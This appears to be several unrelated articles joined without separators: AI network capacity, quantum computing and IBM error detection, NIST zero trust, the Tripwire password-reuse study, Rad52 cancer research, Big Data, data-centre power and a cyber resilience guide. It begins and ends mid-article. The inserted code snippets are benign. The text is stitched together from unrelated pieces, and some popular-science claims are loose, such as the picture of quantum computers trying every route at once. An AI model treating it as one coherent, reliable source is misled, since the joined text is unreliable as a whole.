However, everything changes when AI needs to adapt to real-time situations. And if we want AI to reach its full potential, especially in cases such as disaster recovery and emergency healthcare, it needs that adaptability. Using a real-world example, AI has the potential to process and compare virology reports and patient symptoms from anywhere in the world, meaning it could identify and track potential pandemics before they spiral out of control. Or it can analyse seismic activity, using the data to predict earthquakes. Or cybersecurity activity, to map vulnerabilities and predict attacks. The list goes on.

Why can't our networks support this now?

These scenarios require more network capacity than we currently possess, meaning we'll need to upgrade to keep pace with the core computing power of AI's near-future brain. And we're not talking about the network capacity of data centres, or from one data centre to another, but the capacity going out to individuals and devices at the network's edge - in other words, mobile and broadband networks. These networks are far from ready for AI's growth, and the only way to solve that will be either to upgrade the networks or to shackle AI's development.

So, while experts are warning against the dangers of AI or promoting its positives, it's a bit of a moot discussion until we do something about our network capacity. Unless we act soon, we'll have a super-advanced AI that runs far below its potential.
The most famous line ever written about quantum theory is "If you think you understand quantum mechanics, then you don't understand quantum mechanics". [It's a saying with a level of uncertainty appropriate to the subject. It is usually attributed to Richard Feynman, but there is no record of him saying these words. - Editor]

As the era of quantum computing approaches, and in defiance of the warnings, we thought it might be useful to explain the quantum computing approach, the challenges that remain, and how they are being overcome.

Quantum computing approach

Where classical computing uses a series of logic gates that are either open or closed to build a binary computational framework, the quantum computer uses the fact that a particle can be in different states at the same time. While this sounds hopelessly unlikely (and was lampooned by the father of quantum physics, Schrödinger, in his declaration that under quantum rules his cat could be alive and dead at the same time), it is the underlying truth of all physics at an atomic scale.

Quantum physics opens up an entirely new way of approaching computing that could prove to be millions of times faster than classical computing. This could solve problems such as how proteins interact at a molecular level, or how we could catalyze the electrolysis of water to make a world powered by hydrogen and eliminate greenhouse gases. For many scientists, the prospect of quantum is compared to the ability to see the molecular world in full resolution and sharp focus, rather than the fuzzy interpretation they have today.

So how does a quantum computer work? The best explanation, as set out by Scientific American, is to consider a mouse that is trying to find its way through a maze. While a classical mouse would consider each possible route in turn until it finds its way through, the quantum mouse is able to consider every single route simultaneously.

This multi-route simultaneous approach is possible because of the special characteristics of quantum mechanics. Where in classical computing the bits are either 1 or 0, in quantum computing the bits, now called qubits, can be in a "superposition" where they could be either 1 or 0 or any value in between - in other words, a bit like the famous cat, they can be in more than one state at the same time. This enables a quantum computer to be set up to contain all the possible routes simultaneously and solve the maze problem far faster. By collapsing the state of superposition in the qubits, you reveal which route has the highest probability of being correct.

The importance of entanglement

How is it possible to set up the computational calculation in the first place? The hardware of quantum computers is based on a variety of exotic-sounding technologies such as "trapped ion", "superconducting" and "quantum dot", but all of them use the second quantum characteristic of "entanglement" to set up the qubits for the calculation. If superposition is a tricky proposition to understand, then entanglement is beyond belief: the physical properties of a particle, such as position, momentum and spin, become entangled between different particles so that no matter where they are in the universe, their properties are completely correlated. So a pair of electrons with opposing spins may be entangled while at either end of the universe - and to make matters more bizarre, any attempt to measure their spin or other physical properties will collapse the quantum superposition and lead to what is called "decoherence".

Out of this highly confusing quantum reality comes a major opportunity. While individual qubits exist in a superposition of two states, the number of states increases exponentially as you entangle more qubits with each other. So while a two-qubit system stores four possible values, a 20-qubit system delivers more than a million. Having set up your qubits in states of superposition and entanglement, you can then consider every conceivable route through the calculation maze simultaneously, and as you collapse the state of superposition through measurement, it reveals the likeliest route through the maze.

This exponential growth in processing power gives rise to a computational base that can solve some extremely complex problems, such as new protein interactions or finding catalysts for the efficient electrolysis of water. But there is still a major problem to be overcome: qubits operate at a quantum scale and so inevitably interact with other forces in nature, causing decoherence, which interrupts the operation of the quantum computer.

Noise and the inevitability of errors

The unwanted interaction between qubits and external forces is the biggest single challenge to the commercial application of quantum computing and is largely the focus of developers in the field today. These external forces are in reality just the noise that naturally occurs through particles emitting or absorbing energy, but they represent a sizeable challenge at the quantum scale. Some developers have taken a hardware approach, using supercooling to near absolute zero or vacuum isolation; others have tried a fault-tolerant approach that relies on mathematical post-processing of results to manage the errors. These approaches are limited in how they scale with the number of qubits - and as we noted earlier, it is the scale-up in qubits that gives quantum computing its massive computational advantage over classical computing.

A more recent approach, and one that enables the scale-up of qubits to form a highly powerful quantum computer, is to implement a life-support system for the qubit. This turns many noisy qubits into one logical qubit with centralized command and control. It enables real-time calibration of the qubits, with the entire quantum computer system decoded - essentially reset to eliminate errors - every 400 nanoseconds. Given that a nanosecond is one thousand-millionth of a second, this means the system can be reset between every operation, faster than the natural decoherence of the qubits. This recalibration is enabled by a low-latency control system, which in turn is run by a kernel at the core. The result is a practical solution for errors caused by the noise that is inherent at the quantum level.

As well as operating on existing quantum computers, the new approach is applicable across a wide spectrum of different quantum computing hardware, where it is optimized for every qubit type and matched to its noise profile. Most importantly, it is the enabling step to the scale-up of quantum computers, and by 2023 it is expected that systems based on over 100 qubits will be possible.

To date, the high points of quantum computing have been set by industry giants like Google and IBM, where computers have been scaled up to 50 qubits by overcoming the error correction issue through a highly proprietary approach that can only work with their specific hardware. The real-time control system holds the prospect of giving the many other innovators in quantum computing a reliable means of error correction, and so accelerating the entire community in its bid to deliver operational quantum computing.

What this means for quantum computing

By tackling quantum errors through real-time control based on quantum time periods, we now have in prospect the very real opportunity to bring quantum computing into academic and commercial applications. The value of this cannot be overstated; our understanding of atomic and molecular interactions is hugely limited to what we can observe empirically about how catalysts or surface chemistry interactions work. Using quantum computer simulation, we have the real prospect of understanding how nature truly works by seeing it in high resolution and sharp focus.

Quantum computing will in turn lead to major innovations in the fields of medicine and materials, to the benefit of mankind. From breakthrough drug discovery, to new clean energy fuels, to the capture of carbon dioxide and the combating of climate change, our future as a species may well hang on the computational potential of quantum computing and the ability to overcome the noise of nature.
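As a concrete illustration of superposition, entanglement and the exponential state growth described above, here is a small numpy sketch (an illustration of the standard textbook construction, not code from the article): a Hadamard gate puts one qubit into superposition, a CNOT entangles it with a second, and the state vector doubles in size with every added qubit.

```python
import numpy as np

# Single-qubit |0> state and the Hadamard gate.
zero = np.array([1, 0], dtype=complex)
H = np.array([[1, 1], [1, -1]], dtype=complex) / np.sqrt(2)

# CNOT in the |00>,|01>,|10>,|11> basis: flips qubit 2 when qubit 1 is 1.
CNOT = np.array([[1, 0, 0, 0],
                 [0, 1, 0, 0],
                 [0, 0, 0, 1],
                 [0, 0, 1, 0]], dtype=complex)

# H on the first qubit, then CNOT, yields an entangled Bell state.
state = CNOT @ np.kron(H @ zero, zero)
print(state.real)  # [0.707 0 0 0.707] = (|00> + |11>)/sqrt(2)
# Measuring either qubit instantly fixes the other: that is entanglement.

# The state vector doubles with every qubit: the exponential growth in the text.
for n in (2, 10, 20):
    print(n, "qubits ->", 2 ** n, "amplitudes")
```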
Technology giant IBM announced two major breakthroughs toward building a practical quantum computer, the next evolution in computing that will be required as Moore's Law runs out of steam. Described in the April 29 issue of the journal Nature Communications, the breakthroughs include the ability to detect and measure both kinds of quantum errors simultaneously, and a new kind of circuit design, which the company claims is "the only physical architecture that could successfully scale to larger dimensions."

The two innovations are interrelated: the quantum bit circuit, based on a square lattice of four superconducting "qubits" (short for quantum bits) on a chip roughly one-quarter-inch square, enables both types of quantum errors to be detected at the same time. The IBM project, which was funded in part by the Intelligence Advanced Research Projects Activity (IARPA) Multi-Qubit Coherent Operations program, opts for a square-shaped design as opposed to a linear array, which IBM said prevents the detection of both kinds of quantum errors simultaneously.

Jerry M. Chow, manager of the Experimental Quantum Computing group at IBM's T.J. Watson Research Center and the primary investigator on the IARPA-sponsored Multi-Qubit Coherent Operations project, told InformationWeek that one area they are excited about is the potential for quantum computers to simulate systems in nature.

"In physics and chemistry, quantum computing will allow us to design new materials and drug compounds without the expensive trial-and-error experiments in the lab, dramatically speeding up the rate and pace of innovation," Chow said. "For instance, the effectiveness of drugs is governed by the precise nature of the chemical bonds in the molecules constituting the drug."

He noted that the computational chemistry required for many of these problems is out of the reach of classical computers, and this is one example of where quantum computers may be capable of solving problems that lead to better drug design.

The qubits, IBM said, could be designed and manufactured using standard silicon fabrication techniques, once a handful of superconducting qubits can be manufactured quickly and reliably and boast low error rates.

"Quantum information is very fragile, requiring the quantum elements to be cooled to near absolute zero temperature and shielded from the environment to minimize errors," Chow explained. "A quantum bit, the component that carries information in a quantum system, can be susceptible to two types of errors - bit-flip and phase-flip. If either error occurs, the information is destroyed and it cannot carry out the operation."

He said it is important to detect and measure both types of errors in order to know what errors are present and how to address them, noting that no one has been able to do this before in a scalable architecture.

"We are at the stage of figuring out the building blocks of quantum computers - a new paradigm of computing completely different from how computers are built today," Chow said. "In the arc of quantum computing progress, we are at the moment in time similar to when scientists were building the first transistor. If built, quantum computers have the potential to unlock new applications for scientific discovery and data analysis and will be more powerful than any supercomputer today."
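The bit-flip errors Chow describes have a classical cousin that is easy to demonstrate. The sketch below shows a three-bit repetition code with majority-vote decoding. It is only an analogy: a real quantum code, like IBM's four-qubit lattice, must catch both bit-flips and phase-flips through parity (syndrome) measurements, without reading out the data qubits directly.

```python
import random

def encode(bit: int) -> list[int]:
    """Three-bit repetition code: 0 -> 000, 1 -> 111."""
    return [bit] * 3

def noisy(codeword: list[int], p: float = 0.1) -> list[int]:
    """Flip each bit independently with probability p (a 'bit-flip' error)."""
    return [b ^ (random.random() < p) for b in codeword]

def decode(codeword: list[int]) -> int:
    """Majority vote: corrects any single bit-flip in the codeword."""
    return int(sum(codeword) >= 2)

sent = 1
received = noisy(encode(sent))
print(received, "->", decode(received))  # usually recovers 1 despite the noise
```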
What Is Zero-Trust Cybersecurity?

In February, the National Institute of Standards and Technology released a second draft special publication for public comment on zero trust.

"A single enterprise may operate several internal networks, remote offices with their own local infrastructure, remote and/or mobile individuals, and cloud services," the NIST publication says. "This complexity has outstripped traditional methods of perimeter-based network security as there is no single, easily identified perimeter for the enterprise. Perimeter-based network security has also been shown to be insufficient since once attackers breach the perimeter, further lateral movement is unhindered."

The special publication is designed to give federal IT leaders a "conceptual framework" using vendor-neutral terms, Scott Rose, a computer scientist at NIST, said in January at Duo Security's Zero Trust Security Summit, presented by FedScoop.

"It's where the emphasis of zero-trust implementations lie - whether identity or the actual micro-segmentation or the underlying network itself," Rose told FedScoop after his panel. "Every good solution has elements of all three, it's just: What is the key turning point for the organization?"

As NIST notes, zero trust refers to an "evolving set of network security paradigms that narrows defenses from wide network perimeters to individual resources." A zero-trust architecture uses zero-trust principles to plan enterprise infrastructure and workflows, according to NIST.

"Zero trust assumes there is no implicit trust granted to assets or user accounts based solely on their physical or network location (i.e., local area networks versus the internet)," NIST says. "Authentication and authorization (both user and device) are discrete functions performed before a session to an enterprise resource is established."

The NIST publication gives general deployment models and use cases where zero trust could improve an enterprise's overall cybersecurity posture.

How Agencies Are Shifting to Zero Trust

According to the survey, 50 percent of government respondents said their agencies have strategies to meet the Office of Management and Budget's Federal Identity and Access Management (FICAM) policy requirements. The further along agencies are in realizing a FICAM strategy, "the more advanced they are in consolidating identity and access controls to agency resources," according to the survey. However, between 41 and 48 percent of respondents are still in the early stages of taking inventory of the people and/or devices accessing their organizations' networks.

The survey found that federal IT leaders are moving toward a passwordless user experience, with a little more than half planning to do so within the next two years. Respondents ranked multifactor one-time passwords (33 percent), randomly chosen passwords/PINs (22 percent) and out-of-band authenticators (20 percent) as the top three types of MFA their agencies will increase investment in over the next two years.

If agencies want to move to a zero-trust environment, they will need to adopt a combination of capabilities, the survey notes. Those include the ability to determine which systems and devices are owned or managed by the enterprise and which are not; making all communication to agency resources secure regardless of whether it comes from inside or outside the network perimeter; and ensuring access to individual enterprise resources is granted on a per-connection basis. Nearly half or more of respondents said their agencies had minimal to average capabilities in determining which devices are owned by the enterprise and whether communications and individual connections are secure.
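That "per-connection basis" requirement is the heart of the model: every request is re-evaluated against identity and device posture rather than waved through because of network location. A minimal sketch of such a policy check follows; the policy table, field names, and resource name are invented for illustration, not drawn from the NIST publication.

```python
from dataclasses import dataclass

@dataclass
class Request:
    user: str
    mfa_passed: bool
    device_managed: bool
    resource: str

# Hypothetical per-resource policy: who may connect, and under what conditions.
POLICY = {
    "payroll-db": {
        "allowed_users": {"alice"},
        "require_mfa": True,
        "require_managed_device": True,
    },
}

def authorize(req: Request) -> bool:
    """Evaluate identity and device posture on every connection; default deny."""
    rule = POLICY.get(req.resource)
    if rule is None:
        return False
    if req.user not in rule["allowed_users"]:
        return False
    if rule["require_mfa"] and not req.mfa_passed:
        return False
    if rule["require_managed_device"] and not req.device_managed:
        return False
    return True

print(authorize(Request("alice", True, True, "payroll-db")))   # True
print(authorize(Request("alice", True, False, "payroll-db")))  # False: unmanaged device
```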
Data breaches are a huge and growing cybersecurity issue which affects pretty much everyone who lives in modern society. Just recently I wrote about a 41GB dump file database with 1.4 billion credentials acquired from 252 data breach incidents. The impact of data breaches and how they affect web security is staggering. We're basically all compromised.

I have a confession to make: I use passwords for my various online services which are very difficult to crack, but I do reuse some passwords for multiple accounts. It's my worst security habit. It's also a habit that millions of people engage in, because it can be overwhelming to have to remember a unique password for each and every online service we have. I alone have accounts with Google, Twitter, LinkedIn, Netflix, Funimation, PlayStation, Peerlyst, Steam, and Medium. And there are definitely many other accounts that I have which I can't remember off the top of my head right now. I'm completely typical that way. You may have at least as many online accounts as I do, each with a username and password.

The problem is that if one of my account passwords is leaked in a data breach, an attacker can try the same password with some of my other accounts and gain access to those too. Cyber attackers know that a lot of us reuse passwords.

Joe DeBlasio, Stefan Savage, Geoffrey M. Voelker and Alex C. Snoeren from the University of California San Diego have an exciting research project named Tripwire, not to be confused with the cybersecurity solutions company that's based in Portland, Oregon. The researchers wrote the following in their report:

"While there are a range of vectors by which account credentials can be compromised - including phishing, brute force and malware - perhaps the most pernicious arises from the confluence of data breaches and account reuse... In one recent study, Das et al. estimated that over 40% of users reuse passwords and our own anecdotal experience with stolen bulk account data suggests that up to 20% of stolen credentials may share a password with their primary email account."

DeBlasio created a bot which registered online accounts with 2,300 different web services and websites. Each account is associated with a unique email address, and the passwords used for each account are the same passwords used to authenticate with the email accounts. Basically, DeBlasio's bot replicates what many of us human beings do. The researchers then watched to see if any unauthorized parties used the passwords to break into the associated email accounts.

In order to make sure that the email accounts were being breached through one of the 2,300 web services and not through vulnerabilities in the email services themselves, the researchers created a control group: about 100,000 email accounts were created with the same email provider used in the Tripwire project, and those accounts weren't used by the bots to register for online services.

On to the Findings...

Nineteen of the websites used in the study were compromised. One of those websites is very popular, based in the United States with over 45 million users. The breached websites and companies have not been publicly named by the researchers - understandably, since doing so may be legally risky. "The reality is that these companies didn't volunteer to be part of this study. By doing this, we've opened them up to huge financial and legal exposure. So we decided to put the onus on them to disclose," said Alex C. Snoeren.

When the researchers discovered the account breaches, they contacted the companies about them. "I was heartened that the big sites we interacted with took us seriously," said Snoeren, but the companies didn't inform their customers about the breaches. "I was somewhat surprised no one acted on our results."

The researchers found that the breached email accounts were only rarely used for spam. The attackers generally just monitored the inboxes, possibly looking for useful information such as sensitive financial data.

Simple Passwords vs. Complex Passwords

The researchers also wanted to see the relationship between password complexity and account breaches. They created two accounts per website: one with a simple password, and one with a more complex password. The simple passwords consisted of seven-character words with their first letter capitalized, followed by a single digit. The complex passwords were random ten-character strings of numbers and letters, both lower and upper case, without special characters.

If both the simple-password and complex-password accounts on a website were compromised, that may indicate that the site stores passwords in plaintext. If only the simple-password account was breached, the site likely stores passwords as hashes, a cryptographic technique for enhanced security.

"In eight cases (categories of online services), our system registered for both an 'easy' and a 'hard' account at a site, but logins only occurred on the 'easy' accounts. This behavior suggests that these sites hash passwords sufficiently to at least delay the compromise of accounts with stronger passwords, or are leaking account credentials due to large-scale brute-forcing," DeBlasio et al. wrote in their paper. "Despite well-known security practices, we observed logins using 'hard' passwords on ten sites. These sites appear to have stored account passwords in the clear or used easily-reversed hashes. Our methodology only registered for accounts with easy passwords after it estimated that a hard registration succeeded. This biases our results to under-report compromises, as 'easy' passwords are more frequently compromised. Subsequent invocations of a Tripwire system should avoid this pitfall."

Tips for Users

The researchers advise users to use password managers, use unique passwords for each account, and be careful about what sort of information they disclose online. "Websites ask for a lot of information. Why do they need to know your mother's real maiden name and the name of your dog?" Snoeren said.
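The plaintext-versus-hash distinction the researchers probed is worth making concrete. Below is a minimal sketch of salted password hashing with Python's standard library; a site storing passwords this way leaks only salts and digests in a breach, so even "easy" passwords take work to recover. The iteration count is an illustrative modern figure, not something prescribed by the Tripwire paper.

```python
import hashlib, hmac, os

ITERATIONS = 600_000  # illustrative work factor; tune to current guidance

def hash_password(password: str) -> tuple[bytes, bytes]:
    """Store a random per-user salt and a slow salted hash - never the plaintext."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)

salt, digest = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, digest))  # True
print(verify_password("Tr0ub4dor&3", salt, digest))                   # False
```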
Scientists at Scripps Research have uncovered a new strategy to kill tumors, including some triple-negative breast cancers, without harming healthy cells, a discovery that could lead to more ways to treat tumors while reducing side effects.

The study, published recently in Nature Communications, shows that a molecule in cells, called Rad52, repairs special kinds of damaged DNA that accumulate in some cancers. A future therapeutic could inhibit Rad52, robbing cancer cells of this repair mechanism.

"This could give us a way to kill tumors without harming normal cells," says Xiaohua Wu, Ph.D., professor at Scripps Research and senior author of the study. "That's the future. That's the goal for targeted cancer treatments - to make these treatments a part of precision medicine."

Wu and her colleagues investigate how seemingly healthy cells become cancerous, with an eye toward leveraging differences between cancers and healthy cells to develop new therapeutic approaches. The culprits may differ from patient to patient, so the key to killing specific cancer types is to study the basic roles of proteins, and how things go awry in different cancers. "The most important thing is to understand the defects in all these tumors, and then you can understand how to target them specifically," says Wu.

One cancer subtype is triple-negative breast cancer, which makes up 10 to 20 percent of breast cancer diagnoses. This aggressive form strikes an estimated 28,000 Americans each year. The new research shows how to exploit a weakness in some triple-negative breast cancers: some of these tumors have a deficient version of the gene that codes for a protein called FANCM. Normally, this protein protects regions of DNA called common fragile sites, which are prone to breaking when cells divide.

Wu's team found that FANCM-deficient tumors have to call in a backup team to repair DNA. That's when the protein Rad52 steps in to repair DNA damage in these tumors. This finding came as a surprise because Rad52 plays no essential role in healthy cells.

Next, the researchers tested what would happen if they stopped Rad52 from working in FANCM-deficient cells. As they suspected, the cells accumulated double-strand breaks at common fragile sites. With no way to repair these breaks, the cells died. Follow-up experiments in a mouse model showed that suppressing Rad52 in FANCM-deficient tumors dramatically reduced cell and tumor growth.

This phenomenon, when a cell dies only because of a combination of two defects, is called synthetic lethality. Only cells with both defects will die. This means drugs inhibiting Rad52 would not harm healthy cells, which do have sufficient FANCM; only FANCM-deficient cells, like those seen in some triple-negative breast cancers, would die. "Normal cells are fine when you remove Rad52, so we think potential therapies would have a very low toxicity," Wu says.

Exploiting synthetic lethality is emerging as a crucial strategy in cancer drug design. In fact, the U.S. Food and Drug Administration recently approved several drugs called PARP inhibitors, which also take advantage of synthetic lethality to kill tumors with BRCA mutations.

Wu says the next step in this project is to develop potent small-molecule inhibitors of Rad52 that could be tested as a drug candidate for a new targeted cancer therapy. "This study shows why it's very important to focus on basic research and then follow up on findings that can benefit patients," Wu says.
More information: Hailong Wang et al, "The concerted roles of FANCM and Rad52 in the protection of common fragile sites," Nature Communications (2018). DOI: 10.1038/s41467-018-05066-y
Journal reference: Nature Communications
Provided by: The Scripps Research Institute
Game of Data: A Look at Big Data and its Quest for the Throne

How much data is created daily? 2.5 quintillion bytes. (Everyday Big Data Infographic, VCloud News)

"Big Data" is more than just a technology trend or marketing terminology - it's a vital part of the modern business. Gartner's IT Glossary describes Big Data as "high-volume, high-velocity, and high-variety information assets that demand cost-effective, innovative forms of information processing for enhanced insight and decision making."

What does that mean for you? Big Data has the potential to unlock a wide range of patterns and trends, much of which can help with better decision making and business strategy. Whether your business needs to adjust the price of a product or even change your hours of operation, Big Data can play a crucial role in the way you choose to manage your business.

Businesses generate and gather high volumes of data every day in the process of doing business. Think about a simple transaction: you can't just sell a widget; you need documentation about who made the widget, where the parts for the widget come from and what they cost, how you're going to market the widget, what you're going to charge for the widget, what your competitors charge for the widget, and so on. A lot of pieces of data are generated or shared in the course of a day, and volume is just one aspect of understanding Big Data.

The speed at which businesses move is faster than it was five years ago, thanks to technology and the interconnectedness of global organizations. Not only are large amounts of data being created, shared, and stored, but the speed at which that data is generated has increased. The "drinking from a fire hose" cliché perfectly applies to the fast flow of data into and out of organizations non-stop, all day, every day. Most businesses don't track where the data comes from, how it can be used, or where it's stored. This velocity is important to understand, as the data deluge is a core reason why a new category of data collection and storage is needed.

On a regular basis, businesses generate a diverse amount of data, such as customer buying habits, website traffic, music downloads, HR or finance information, or research information. Only some of this arrives as structured data - rational, logical data that fits in an easily searchable database or spreadsheet. The rest is unstructured data, which is not easy to analyze or categorize, makes up the majority of business data, and requires additional algorithms or intelligence to sort through. To add to the complexity, unstructured data comes in all shapes and sizes: digital files such as photos, videos, audio recordings, email messages, documents, books, tweets, and presentations are all forms of varied, unstructured data. Data diversity is an important element when it comes to understanding the difference between Big Data and other types of data.

Information, Insight, and Decision Making

Analyzing Big Data requires that you first separate the wheat from the chaff, ultimately making the data accessible and usable. The right aggregators and data integration tools can gather that data into usable containers and provide you with the proper algorithms to access that data in informative ways. Organizing the data into a central repository is an important step in Big Data management. The analysis of the data is also where you gain the most actionable insights for your business (a small worked example follows this article). In today's ever-changing business climate, if you aren't using your organization's Big Data to your advantage, you could find yourself one step behind the competition.

Protecting That Data

Businesses must pursue dedicated data management solutions to securely and efficiently manage their Big Data migration needs. These tools must not only be capable of moving large information sets quickly and effectively, but also of protecting that data when it is in motion, as this is when Big Data is most exposed. Solutions designed specifically for Big Data movement can help safeguard the information as it is sent and received by individuals and departments within a given organization and between locations.

Want to learn more about how a secure managed file transfer solution can help manage your Big Data challenges? Contact a Globalscape Solution Specialist today to let us help you!
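Returning to the "data to insight" step above: here is a short, hypothetical pandas example in which raw transaction records (volume and velocity in miniature) are aggregated into a revenue summary a decision-maker can act on. The column names and figures are invented for illustration.

```python
import pandas as pd

# Hypothetical raw transaction feed - the kind of record a business
# generates with every widget sold.
sales = pd.DataFrame({
    "widget": ["A", "A", "B", "B", "B"],
    "region": ["EU", "US", "EU", "US", "US"],
    "price":  [9.99, 9.49, 14.99, 13.99, 13.49],
    "units":  [120, 300, 80, 150, 170],
})
sales["revenue"] = sales["price"] * sales["units"]

# Aggregate the raw records into decision-ready insight:
# which widget earns the most, and where?
summary = sales.groupby(["widget", "region"])["revenue"].sum().reset_index()
print(summary.sort_values("revenue", ascending=False))
```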
There was a time when data center operators, engineers, and consultants could safely focus on their core areas of data storage and data processing, secure in the knowledge that the power socket would deliver a sufficient and stable supply of energy to maintain and expand the data center business. Now, ensuring sufficient power, its reliable supply, and steady quality from the grid have become strategic concerns.

Not only is the constant growth of data center infrastructure, with its increasing demand for power, outstripping grid capacity in some areas of the world; the increasing share of stochastic renewable in-feed also creates volatility and fluctuation, so the availability and quality of power supply have dropped and can threaten reliable data center operation.

One solution to this challenge facing the data center industry is on-site generation of electricity and cooling. Diesel generators have long been the go-to option for rapid backup power, at the cost of increased emissions of hazardous exhaust gases and pollutant particles. However, with the latest advances in highly efficient gas turbine technology, generating power on-site for the main supply of data centers has become far more attractive, solving grid challenges today and in the long term. In the future, these stable, low-emission on-site power generation solutions will be able to run exclusively on carbon-free fuels such as e-hydrogen.
Nowadays, cyber threats are an ever-present risk that can disrupt business operations, compromise sensitive data, and damage an organization's reputation. As cyber attacks become more sophisticated and frequent, the ability not just to prevent but also to withstand and recover from these threats has become paramount. This is where the concept of cyber resilience comes into play.

Cyber resilience goes beyond traditional cybersecurity measures, focusing on the holistic capability of an organization to continue operating amidst and after a cyber attack. A cyber resilience strategy relies on anticipating potential threats, minimizing their impact, and resuming operations as soon as possible. To achieve this level of preparedness and responsiveness, organizations must develop and implement comprehensive, effective incident response and cybersecurity plans.

Today, we will delve into the key components of a strong cyber resilience strategy and explore the essential elements that empower organizations to protect their critical assets, ensure continuity of operations, and adapt to the ever-evolving cyber threat landscape.

Cyber Resilience Strategy – Definition and Key Components

A cyber resilience strategy is a comprehensive plan designed to help organizations prepare for, respond to, and recover from cyber threats. Unlike traditional cybersecurity, which focuses primarily on preventing attacks, a viable cyber resilience strategy emphasizes the importance of maintaining business operations even when an attack occurs. It encompasses a holistic approach that integrates risk management, incident response, business continuity, and continuous improvement.

The key components of an organization's cyber resilience include:
- Preparedness: Establishing processes and protocols to anticipate and prepare for potential cyber threats.
- Detection: Implementing systems and technologies to identify and detect cyber threats in real time.
- Response: Developing and executing a response plan to mitigate the impact of cyber incidents.
- Recovery: Ensuring the organization can quickly recover and return to normal operations after a cyber incident.
- Adaptation: Continuously improving and updating strategies (including the cyber resilience plan) based on lessons learned and evolving threats.

Elements of a Successful Cyber Resilience Strategy

A cyber resilience strategy is a structured approach designed to enhance an organization's ability to withstand and recover from cyber attacks while maintaining continuous operations. It encompasses a comprehensive set of practices, policies, tools, and technologies aimed at helping the organization withstand and adapt to adverse cyber events. Here are the key elements of a successful cyber resilience strategy:

1. Risk Assessment and Management:
- Identify Critical Assets: Identify essential operational activities, assets, data, and processes (mission-critical systems).
- Threat Analysis: Understand the types of cyber threats that could impact the organization.
- Vulnerability Assessment: Identify weaknesses within the organization's systems and infrastructure.
- Risk Mitigation: Implement strategies and controls to reduce identified risks.

2. Governance and Compliance:
- Policies and Procedures: Establish and enforce policies to manage cyber risks effectively.
- Regulatory Compliance: Ensure the organization meets all relevant legal and regulatory requirements.
- Roles and Responsibilities: Clearly define roles and responsibilities for cybersecurity and resilience efforts.

3. Technology and Infrastructure:
- Security Controls: Deploy advanced security technologies such as firewalls, intrusion detection systems, and encryption.
- Resilient Infrastructure: Build robust IT infrastructure that can withstand and quickly recover from cyber attacks.
- Response Tools: Utilize tools and technologies to respond to and manage cyber threats efficiently.

Trust AMATAS cyber security testing services for detailed assessments to enhance your cyber defenses.

4. Human Factors and Training:
- Awareness Programs: Conduct regular training sessions to educate employees about cyber threats and best practices.
- Skill Development: Continuously enhance the cybersecurity skills of the workforce.
- Cultural Change: Promote a culture of cyber awareness and resilience within the organization.

5. Incident Response and Management:
- Response Plan: Develop a detailed incident recovery and response plan outlining steps to take during a cyber incident.
- Communication: Establish clear communication protocols for internal and external stakeholders.
- Testing and Drills: Regularly test the response plan through simulations and drills to ensure effectiveness.

6. Business Continuity and Disaster Recovery:
- Continuity Planning: Integrate cyber resilience into broader business continuity plans.
- Backup and Recovery: Ensure regular backups and quick recovery capabilities for mission-critical company assets, e.g., data and systems.
- Resilience Metrics: Use key performance indicators and metrics to measure and monitor resilience.

7. Continuous Improvement:
- Monitoring and Review: Continuously monitor cyber resilience efforts and review their effectiveness.
- Feedback Loop: Incorporate lessons learned from incidents and drills into the strategy.
- Innovation: Stay updated with the latest technologies and practices in cybersecurity.

A strong cyber resilience strategy equips organizations with the tools and processes needed to navigate the complex and evolving cyber threat landscape, ensuring they can sustain their operations, protect their assets, and uphold their reputation even in the face of adversity.

Cornerstones of a Cyber Resilience Strategy

To build a strong cyber resilience strategy, organizations must focus on several fundamental aspects that collectively enhance their ability to withstand and recover from cyber threats.

Identifying Potential Threats and Vulnerabilities

Continuous monitoring and detection of security weaknesses are crucial to preventing potential breaches. Organizations must employ advanced tools and techniques, alongside existing security protocols and processes, and perform a risk analysis to identify vulnerabilities within their systems. Regular use of vulnerability assessment services and threat intelligence gathering helps in understanding the evolving threat landscape and preparing defenses accordingly. This proactive approach ensures that potential threats are identified and addressed before they can cause significant harm.

Assessing and Prioritizing Risks

Once potential threats and vulnerabilities are identified, the next step is to assess and prioritize the associated risks. This involves analyzing the impact and likelihood of various threats to prioritize them effectively. By focusing resources on the critical areas with the highest risk, organizations can allocate their cybersecurity efforts more efficiently.
Risk assessment frameworks, such as the NIST Cybersecurity Framework, can provide structured methodologies for this evaluation process (a toy risk-scoring sketch appears at the end of this post).

Developing Incident Response Plans

Creating structured response plans is vital for managing security incidents effectively. These plans should outline specific steps to take during a cyber incident, including roles and responsibilities, communication protocols, and recovery procedures. Regularly testing and updating these plans through simulations and drills ensures that the organization is prepared to respond swiftly and minimize damage during a real incident.

Establishing a Resilient Framework for Business Processes

A resilient business framework ensures that operations can continue without significant disruption during a cyber attack. This involves designing and implementing robust processes and systems that can withstand cyber incidents. Redundancy, failover mechanisms, and disaster recovery plans are essential components of this framework. By ensuring business continuity, organizations can maintain critical functions and services even in the face of cyber threats and achieve cyber resilience.

Ensuring Information Security and Data Protection

Protecting sensitive information from unauthorized access and breaches is a cornerstone of effective cyber resilience. Implementing strong security policies, encryption, access controls, and data loss prevention measures is essential to safeguard critical data. Regular audits and compliance with data protection regulations, such as the GDPR, DORA, or the CCPA, further enhance information security and build trust with stakeholders.

Incorporating AI in Cyber Resilience

Leveraging advanced technologies like AI can significantly enhance cyber resilience. These technologies can analyze vast amounts of data to predict, detect, and respond to cyber threats in real time. AI-driven security solutions can identify patterns and anomalies that traditional methods might miss, providing an additional layer of defense and improving the overall security posture.

Building a Cyber Resilience Framework

To ensure comprehensive coverage, organizations must develop a well-structured cyber resilience framework. This framework integrates various components and practices to create a cohesive and effective approach to cybersecurity.

Understanding the Resilience Framework and Its Components

A cyber resilience framework comprises several key elements designed to provide complete security coverage. These include risk management, incident response, business continuity, and continuous improvement. Understanding these components and how they interrelate is crucial for developing an effective strategy that addresses all aspects of an organization's cyber resilience.

Implementation of a Risk Management Approach

Adopting strategic risk management practices is essential for identifying, assessing, and mitigating potential cyber threats. This involves establishing risk management processes, conducting regular risk assessments, and implementing controls to reduce identified risks. By systematically managing risks, organizations can prioritize their cybersecurity efforts and allocate resources more effectively.

Regular Tests and Evaluations of Framework Effectiveness

